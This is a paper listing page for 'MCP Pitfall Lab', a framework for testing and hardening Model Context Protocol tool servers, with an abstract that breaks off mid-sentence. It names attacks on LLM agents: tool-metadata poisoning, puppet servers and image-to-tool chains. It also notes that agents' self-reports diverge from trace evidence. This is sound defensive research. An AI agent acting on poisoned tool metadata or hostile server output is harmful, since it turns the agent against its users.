MCP Pitfall Lab: Exposing Developer Pitfalls in MCP Tool Server Security under Multi-Vector Attacks
Run Hao, Zhuoran Tan

TL;DR
MCP Pitfall Lab is a security testing framework that identifies and mitigates developer pitfalls in MCP tool servers, enhancing robustness against multi-vector attacks through trace-based validation and hardening.
Contribution
It introduces a protocol-aware, trace-grounded security testing framework for MCP, with automated analysis and practical hardening guidance against complex attack scenarios.
Findings
Achieves perfect F1 score on static analysis for key pitfalls.
Eliminates all identified pitfalls after applying hardening measures.
Motivates trace-based auditing due to divergence between narratives and evidence.
Abstract
Model Context Protocol (MCP) is increasingly adopted for tool-integrated LLM agents, but its multi-layer design and third-party server ecosystem expand risks across tool metadata, untrusted outputs, cross-tool flows, multimodal inputs, and supply-chain vectors. Existing MCP benchmarks largely measure robustness to malicious inputs but offer limited remediation guidance. We present MCP Pitfall Lab, a protocol-aware security testing framework that operationalizes developer pitfalls as reproducible scenarios and validates outcomes with MCP traces and objective validators (rather than agent self-report). We instantiate three workflow challenges (email, document, crypto) with six server variants (baseline and hardened) and model three attack families: tool-metadata poisoning, puppet servers, and multimodal image-to-tool chains, in a unified, trace-grounded evaluation. In Tier-1 static…
Peer Reviews
No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.
Videos
No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.
